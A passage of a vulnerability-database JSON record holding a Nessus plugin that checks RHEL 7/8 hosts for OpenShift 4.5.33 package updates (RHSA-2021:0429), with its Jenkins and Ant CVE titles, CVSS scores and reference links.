"https://cwe.mitre.org/data/definitions/59.html", "https://bugzilla.redhat.com/1925143", "https://bugzilla.redhat.com/1925156", "https://bugzilla.redhat.com/1837444", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1921322", "https://cwe.mitre.org/data/definitions/770.html", "https://bugzilla.redhat.com/1925160", "https://bugzilla.redhat.com/1925157", "https://cwe.mitre.org/data/definitions/502.html", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://access.redhat.com/security/cve/CVE-2021-21605", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://access.redhat.com/security/cve/CVE-2021-21615", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11979", "https://cwe.mitre.org/data/definitions/863.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21603", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21615", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://bugzilla.redhat.com/1925151", "https://access.redhat.com/security/cve/CVE-2020-11979", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21602", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21609", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://access.redhat.com/errata/RHSA-2021:0429", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21605", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1903702", "https://bugzilla.redhat.com/1925145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21604", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21608", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1945", "https://cwe.mitre.org/data/definitions/377.html", "https://cwe.mitre.org/data/definitions/22.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21607", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21610", "https://cwe.mitre.org/data/definitions/20.html", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://access.redhat.com/security/cve/CVE-2021-21610"], "cvelist": ["CVE-2020-1945", "CVE-2020-11979", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615"], "immutableFields": [], "lastseen": "2021-08-05T12:52:56", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0637", "RHSA-2021:0423", "RHSA-2020:4960", "RHSA-2020:2618", "RHSA-2021:0719", "RHSA-2020:4961", "RHSA-2021:0429"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2021-0423.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "JENKINS_2_276.NASL", "EULEROS_SA-2021-1133.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "GENTOO_GLSA-202011-18.NASL", "JENKINS_2_274.NASL", "FEDORA_2020-92B1D001B3.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL"]}, {"type": "archlinux", "idList": ["ASA-202101-41", "ASA-202012-5", "ASA-202005-15"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1945", "RH:CVE-2021-21604", "RH:CVE-2021-21608", "RH:CVE-2021-21603", "RH:CVE-2021-21610", "RH:CVE-2021-21611", "RH:CVE-2021-21602", "RH:CVE-2020-11979", "RH:CVE-2021-21609", "RH:CVE-2021-21606", "RH:CVE-2021-21615", "RH:CVE-2021-21607", "RH:CVE-2021-21605"]}, {"type": "cve", "idList": ["CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21611", "CVE-2021-21605", "CVE-2021-21609", "CVE-2021-21603", "CVE-2021-21608", "CVE-2021-21615", "CVE-2021-21602", "CVE-2021-21610"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-11979", "UB:CVE-2020-1945"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "fedora", "idList": ["FEDORA:146FE30DD5E7", "FEDORA:52396606732B", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF", "FEDORA:6869030D3139"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877930", "OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021", "ORACLE:CPUJUL2020", "ORACLE:CPUJAN2021", "ORACLE:CPUOCT2020", "ORACLE:CPUJUL2021"]}], "modified": "2021-08-05T12:52:56", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-08-05T12:52:56", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147015", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0429. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147015);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/26\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-11979\",\n \"CVE-2021-21602\",\n \"CVE-2021-21603\",\n \"CVE-2021-21604\",\n \"CVE-2021-21605\",\n \"CVE-2021-21606\",\n \"CVE-2021-21607\",\n \"CVE-2021-21608\",\n \"CVE-2021-21609\",\n \"CVE-2021-21610\",\n \"CVE-2021-21611\",\n \"CVE-2021-21615\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0429\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1921322\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21605\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 22, 59, 79, 377, 502, 770, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:conmon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:machine-config-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_4_5_el7': [\n 'rhel-7-for-system-z-ose-4.5-debug-rpms',\n 'rhel-7-for-system-z-ose-4.5-rpms',\n 'rhel-7-for-system-z-ose-4.5-source-rpms',\n 'rhel-7-server-ose-4.5-debug-rpms',\n 'rhel-7-server-ose-4.5-rpms',\n 'rhel-7-server-ose-4.5-source-rpms'\n ],\n 'openshift_4_5_el8': [\n 'rhocp-4.5-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nrepo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE || empty_or_null(repo_sets)) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\npkgs = [\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el7']},\n {'reference':'jenkins-2.263.3.1612434332-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el8']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets);\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'conmon / jenkins / machine-config-daemon / openshift-ansible / etc');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": [], "solution": "Update the affected packages.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-21605", "vpr": {"risk factor": "Medium", "score": "6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-03T00:00:00", "vulnerabilityPublicationDate": "2020-05-14T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-05T12:52:56", "differentElements": ["cpe"], "edition": 7}, {"bulletin": {"id": "REDHAT-RHSA-2021-0429.NASL", "hash": "ba2d2e23260d51c71c88087f9e02b3e6", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-03-03T00:00:00", "modified": "2021-07-26T00:00:00", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147015", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2021-21611", "https://bugzilla.redhat.com/1925157", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://access.redhat.com/security/cve/CVE-2021-21610", "https://access.redhat.com/errata/RHSA-2021:0429", "https://bugzilla.redhat.com/1925141", "https://bugzilla.redhat.com/1925156", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21615", "https://cwe.mitre.org/data/definitions/22.html", "https://cwe.mitre.org/data/definitions/502.html", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/security/cve/CVE-2020-11979", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21611", "https://bugzilla.redhat.com/1837444", "https://cwe.mitre.org/data/definitions/20.html", "https://cwe.mitre.org/data/definitions/863.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21609", "https://bugzilla.redhat.com/1925160", "https://bugzilla.redhat.com/1925151", "https://access.redhat.com/security/cve/CVE-2021-21609", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21607", "https://bugzilla.redhat.com/1925143", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925145", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2021-21605", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925161", "https://cwe.mitre.org/data/definitions/59.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21602", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11979", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21606", "https://cwe.mitre.org/data/definitions/377.html", "https://cwe.mitre.org/data/definitions/770.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21610", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21608", "https://bugzilla.redhat.com/1921322", "https://bugzilla.redhat.com/1925140", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21603", "https://cwe.mitre.org/data/definitions/79.html", "https://access.redhat.com/security/cve/CVE-2021-21615", "https://bugzilla.redhat.com/1925159", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21605", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21604"], "cvelist": ["CVE-2020-1945", "CVE-2020-11979", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615"], "immutableFields": [], "lastseen": "2021-08-06T13:27:10", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0637", "RHSA-2020:2618", "RHSA-2021:0429", "RHSA-2020:4961", "RHSA-2020:4960", "RHSA-2021:0719", "RHSA-2021:0423"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2021-0423.NASL", "FEDORA_2020-2640AA4E19.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "JENKINS_2_276.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "JENKINS_2_274.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "FEDORA_2020-92B1D001B3.NASL"]}, {"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202012-5", "ASA-202101-41"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21610", "RH:CVE-2020-1945", "RH:CVE-2021-21607", "RH:CVE-2021-21605", "RH:CVE-2021-21606", "RH:CVE-2021-21603", "RH:CVE-2021-21615", "RH:CVE-2021-21609", "RH:CVE-2021-21611", "RH:CVE-2021-21602", "RH:CVE-2021-21608", "RH:CVE-2020-11979", "RH:CVE-2021-21604"]}, {"type": "cve", "idList": ["CVE-2021-21603", "CVE-2021-21606", "CVE-2021-21610", "CVE-2021-21609", "CVE-2021-21615", "CVE-2021-21607", "CVE-2021-21602", "CVE-2021-21611", "CVE-2021-21608", "CVE-2021-21604"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-11979", "UB:CVE-2020-1945"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "fedora", "idList": ["FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF", "FEDORA:146FE30DD5E7", "FEDORA:6869030D3139", "FEDORA:52396606732B"]}, {"type": "github", "idList": ["GHSA-4P6W-M9WC-C9C9", "GHSA-F62V-XPXF-3V68"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310877930", "OPENVAS:1361412562310844454"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "oracle", "idList": 